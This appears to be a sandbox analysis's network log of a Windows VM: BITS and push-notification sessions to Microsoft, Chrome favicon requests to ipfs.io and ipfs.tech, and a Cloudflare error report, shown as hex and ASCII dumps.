2024-07-10 22:38:24 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 69 66 6b 35 37 35 49 6b 37 45 32 76 36 39 42 34 2b 71 61 56 4a 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: ifk575Ik7E2v69B4+qaVJw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49723	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:26 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-10 22:38:26 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF67) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-neu-z1 Cache-Control: public, max-age=235888 Date: Wed, 10 Jul 2024 22:38:26 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49724	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:26 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-10 22:38:27 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=235864 Date: Wed, 10 Jul 2024 22:38:27 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-10 22:38:27 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port
6	192.168.2.6	49725	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:32 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 4b 74 77 59 4a 37 48 77 4d 45 57 6f 6f 66 2b 53 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 66 34 32 32 64 66 39 33 36 62 64 30 61 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: KtwYJ7HwMEWoof+S.1Context: 9c3f422df936bd0a
2024-07-10 22:38:32 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-10 22:38:32 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 4b 74 77 59 4a 37 48 77 4d 45 57 6f 6f 66 2b 53 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 66 34 32 32 64 66 39 33 36 62 64 30 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 38 45 74 69 52 70 6f 6a 42 44 67 72 66 53 47 68 73 78 45 53 4f 4a 65 54 58 44 73 66 41 33 42 32 6f 5a 33 4e 2b 67 6a 53 4f 57 4f 56 47 51 44 4e 46 53 56 6f 4b 4f 44 4f 48 2f 32 72 74 41 74 46 6c 53 42 47 63 6c 72 72 6e 42 4e 53 54 6a 70 66 6c 4a 2b 6d 38 6d 67 58 69 6c 37 46 39 69 49 79 57 56 31 4f 31 59 4b 34 6d 59 77 32 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: KtwYJ7HwMEWoof+S.2Context: 9c3f422df936bd0a<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe8EtiRpojBDgrfSGhsxESOJeTXDsfA3B2oZ3N+gjSOWOVGQDNFSVoKODOH/2rtAtFlSBGclrrnBNSTjpflJ+m8mgXil7F9iIyWV1O1YK4mYw2
2024-07-10 22:38:32 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 4b 74 77 59 4a 37 48 77 4d 45 57 6f 6f 66 2b 53 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 39 63 33 66 34 32 32 64 66 39 33 36 62 64 30 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: KtwYJ7HwMEWoof+S.3Context: 9c3f422df936bd0a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-10 22:38:33 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
2024-07-10 22:38:33 UTC	58	IN	Data Raw: 4d 53 2d 43 56 3a 20 4d 78 4c 38 48 6a 69 2f 65 45 71 4a 35 6a 65 51 44 6a 4e 66 63 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e Data Ascii: MS-CV: MxL8Hji/eEqJ5jeQDjNfcw.0Payload parsing failed.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49730	209.94.90.1	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:43 UTC	634	OUT	GET /favicon.ico HTTP/1.1 Host: ipfs.io Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ipfs.io/ipfs/bafkreighlryyquvwncfjki32xkca3dafzoxaan33ptn7lqqb5hzvwz4zfy Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:43 UTC	325	IN	HTTP/1.1 301 Moved Permanently Date: Wed, 10 Jul 2024 22:38:43 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close location: https://ipfs.tech/favicon.ico x-ipfs-pop: rainbow-dc13-01 CF-Cache-Status: HIT Age: 176 Server: cloudflare CF-RAY: 8a140bb308282363-EWR alt-svc: h3=":443"; ma=86400
2024-07-10 22:38:43 UTC	175	IN	Data Raw: 61 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 37 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a Data Ascii: a9<html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.27.0</center></body></html>
2024-07-10 22:38:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49731	35.190.80.1	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:43 UTC	555	OUT	OPTIONS /report/v4?s=va6lKs5sRIm7VETm2nWIlphmI6Tc6YbKxFUvxA%2FUF%2Bjpd4Y4blytGKPSG%2B2vLIfibY8IcWp5%2BoRdKPz92ntHbDBOXwPXXf5GSbuthgGLnpZNDuuwcja4mHM%2BVpxkaQ3xfWz176VAkw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://fiveradio-newbam.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:43 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-length, content-type date: Wed, 10 Jul 2024 22:38:43 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49733	35.190.80.1	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:44 UTC	492	OUT	POST /report/v4?s=va6lKs5sRIm7VETm2nWIlphmI6Tc6YbKxFUvxA%2FUF%2Bjpd4Y4blytGKPSG%2B2vLIfibY8IcWp5%2BoRdKPz92ntHbDBOXwPXXf5GSbuthgGLnpZNDuuwcja4mHM%2BVpxkaQ3xfWz176VAkw%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 417 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:44 UTC	417	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 34 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 39 39 35 36 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 69 70 66 73 2e 69 6f 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 38 34 2e 32 30 30 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 35 32 32 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 Data Ascii: [{"age":43,"body":{"elapsed_time":19956,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://ipfs.io/","sampling_fraction":1.0,"server_ip":"104.21.84.200","status_code":522,"type":"http.error"},"type":"network-error","url":"https
2024-07-10 22:38:44 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Wed, 10 Jul 2024 22:38:44 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49732	185.93.3.244	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:44 UTC	571	OUT	GET /favicon.ico HTTP/1.1 Host: ipfs.tech Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://ipfs.io/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:44 UTC	1720	IN	HTTP/1.1 200 OK Date: Wed, 10 Jul 2024 22:38:44 GMT Content-Type: image/x-icon Content-Length: 15086 Connection: close Vary: Accept-Encoding Server: BunnyCDN-ES1-895 CDN-PullZone: 2016121 CDN-Uid: 070ccd6e-b4b0-4c90-b45a-e26d7534205d CDN-RequestCountryCode: US Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Headers: Range Access-Control-Allow-Headers: User-Agent Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET Access-Control-Allow-Methods: HEAD Access-Control-Allow-Methods: OPTIONS Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length Access-Control-Expose-Headers: Content-Range Access-Control-Expose-Headers: X-Chunked-Output Access-Control-Expose-Headers: X-Ipfs-Path Access-Control-Expose-Headers: X-Ipfs-Roots Access-Control-Expose-Headers: X-Stream-Output Cache-Control: max-age=60, stale-while-revalidate=3600 ETag: "QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT" CDN-CachedAt: 06/13/2024 17:07:27 X-Ipfs-Path: /ipfs/bafybeig2htkx6trji2aast7x6bdymzdgm4gc4ouvp25n7fufr55nitci3y/favicon.ico X-Ipfs-Roots: bafybeig2htkx6trji2aast7x6bdymzdgm4gc4ouvp25n7fufr55nitci3y,QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT Strict-Transport-Security: max-age=31536000; includeSubDomains X-Request-ID: 92f86e567c5c3d7317dc6838d3d528ac Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: upgrade-insecure-requests X-XSS-Protection: 0 X-Content-Type-Options: nosniff X-Cache-Status: MISS CDN-ProxyVer: 1.04 CDN-RequestPullCode: 200 CDN-RequestPullSuccess: True CDN-EdgeStorageId: 895 CDN-Status: 200 CDN-RequestId: 3f4187f592f6ad4fe3d257bfc3634792 CDN-Cache: HIT Accept-Ranges: bytes
2024-07-10 22:38:44 UTC	14664	IN	Data Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 00 %6 % h6(0` $
2024-07-10 22:38:44 UTC	48	IN	Data Raw: 6b ff d1 ca 6a ff d1 ca 6a ff d2 cb 6b ff cd c7 67 ff bc b7 5a ff ae a9 50 ff a4 9f 48 ca 99 94 3f 0e 00 00 00 00 00 00 00 00 7a 68 29 01 9e 99 Data Ascii: kjjkgZPH?zh)
2024-07-10 22:38:44 UTC	374	IN	Data Raw: 43 63 ad a9 4f de c7 c0 62 ff d1 ca 6a ff d1 ca 6a ff d1 ca 6a ff d1 ca 6a ff d1 ca 6a ff d1 ca 6a ff c8 c2 63 ff b0 ab 51 e6 a0 9c 44 75 9e 98 43 04 00 00 00 00 00 00 00 00 00 00 00 00 a4 a1 48 01 a0 9c 45 28 a9 a5 4c 95 b9 b4 58 ee cb c4 65 ff d1 ca 6a ff d2 cb 6b ff cc c5 66 ff bb b6 59 f3 ab a6 4d a2 a1 9d 45 32 a0 9d 45 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 93 90 3b 04 a1 9d 45 41 ad a9 4f b3 ba b4 58 f8 ba b5 59 fb af aa 50 bf a2 9e 46 4c 96 93 3d 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9a 97 40 0d a0 9d 45 5c a1 9d 45 65 9c 98 41 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: CcObjjjjjjcQDuCHE(LXejkfYME2E;EAOXYPFL=@E\EeA

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49735	169.150.247.39	443	2912	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:46 UTC	344	OUT	GET /favicon.ico HTTP/1.1 Host: ipfs.tech Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-10 22:38:46 UTC	1722	IN	HTTP/1.1 200 OK Date: Wed, 10 Jul 2024 22:38:46 GMT Content-Type: image/x-icon Content-Length: 15086 Connection: close Vary: Accept-Encoding Server: BunnyCDN-DE1-1082 CDN-PullZone: 2016121 CDN-Uid: 070ccd6e-b4b0-4c90-b45a-e26d7534205d CDN-RequestCountryCode: US Access-Control-Allow-Headers: Content-Type Access-Control-Allow-Headers: Range Access-Control-Allow-Headers: User-Agent Access-Control-Allow-Headers: X-Requested-With Access-Control-Allow-Methods: GET Access-Control-Allow-Methods: HEAD Access-Control-Allow-Methods: OPTIONS Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length Access-Control-Expose-Headers: Content-Range Access-Control-Expose-Headers: X-Chunked-Output Access-Control-Expose-Headers: X-Ipfs-Path Access-Control-Expose-Headers: X-Ipfs-Roots Access-Control-Expose-Headers: X-Stream-Output Cache-Control: max-age=60, stale-while-revalidate=3600 ETag: "QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT" CDN-CachedAt: 06/13/2024 17:08:00 X-Ipfs-Path: /ipfs/bafybeig2htkx6trji2aast7x6bdymzdgm4gc4ouvp25n7fufr55nitci3y/favicon.ico X-Ipfs-Roots: bafybeig2htkx6trji2aast7x6bdymzdgm4gc4ouvp25n7fufr55nitci3y,QmULFXXZMtQ2wCXDU6L8d9R4bYiQi7GpENhhZFF7ctPJDT Strict-Transport-Security: max-age=31536000; includeSubDomains X-Request-ID: 92f86e567c5c3d7317dc6838d3d528ac Referrer-Policy: strict-origin-when-cross-origin Content-Security-Policy: upgrade-insecure-requests X-XSS-Protection: 0 X-Content-Type-Options: nosniff X-Cache-Status: MISS CDN-ProxyVer: 1.04 CDN-RequestPullCode: 200 CDN-RequestPullSuccess: True CDN-EdgeStorageId: 1082 CDN-Status: 200 CDN-RequestId: 1f99c74852d9e74e90c3329d3f78842d CDN-Cache: HIT Accept-Ranges: bytes
2024-07-10 22:38:46 UTC	15086	IN	Data Raw: 00 00 01 00 03 00 30 30 00 00 01 00 20 00 a8 25 00 00 36 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 de 25 00 00 10 10 00 00 01 00 20 00 68 04 00 00 86 36 00 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 20 00 00 00 00 00 00 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 00 %6 % h6(0` $

Session ID	Source IP	Source Port	Destination IP	Destination Port
12	192.168.2.6	49734	40.113.103.199	443

Timestamp	Bytes transferred	Direction	Data
2024-07-10 22:38:46 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 78 65 42 52 74 75 47 39 41 45 4f 76 6d 6a 2f 50 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 65 64 65 63 31 31 34 65 66 33 66 35 30 36 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: xeBRtuG9AEOvmj/P.1Context: 28edec114ef3f506
2024-07-10 22:38:46 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
2024-07-10 22:38:46 UTC	1064	OUT	Data Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 78 65 42 52 74 75 47 39 41 45 4f 76 6d 6a 2f 50 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 65 64 65 63 31 31 34 65 66 33 66 35 30 36 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 65 38 45 74 69 52 70 6f 6a 42 44 67 72 66 53 47 68 73 78 45 53 4f 4a 65 54 58 44 73 66 41 33 42 32 6f 5a 33 4e 2b 67 6a 53 4f 57 4f 56 47 51 44 4e 46 53 56 6f 4b 4f 44 4f 48 2f 32 72 74 41 74 46 6c 53 42 47 63 6c 72 72 6e 42 4e 53 54 6a 70 66 6c 4a 2b 6d 38 6d 67 58 69 6c 37 46 39 69 49 79 57 56 31 4f 31 59 4b 34 6d 59 77 32 Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: xeBRtuG9AEOvmj/P.2Context: 28edec114ef3f506<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAe8EtiRpojBDgrfSGhsxESOJeTXDsfA3B2oZ3N+gjSOWOVGQDNFSVoKODOH/2rtAtFlSBGclrrnBNSTjpflJ+m8mgXil7F9iIyWV1O1YK4mYw2
2024-07-10 22:38:46 UTC	218	OUT	Data Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 78 65 42 52 74 75 47 39 41 45 4f 76 6d 6a 2f 50 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 32 38 65 64 65 63 31 31 34 65 66 33 66 35 30 36 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e Data Ascii: BND 3 CON\WNS 0 197MS-CV: xeBRtuG9AEOvmj/P.3Context: 28edec114ef3f506<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
2024-07-10 22:38:46 UTC	14	IN	Data Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a Data Ascii: 202 1 CON 58
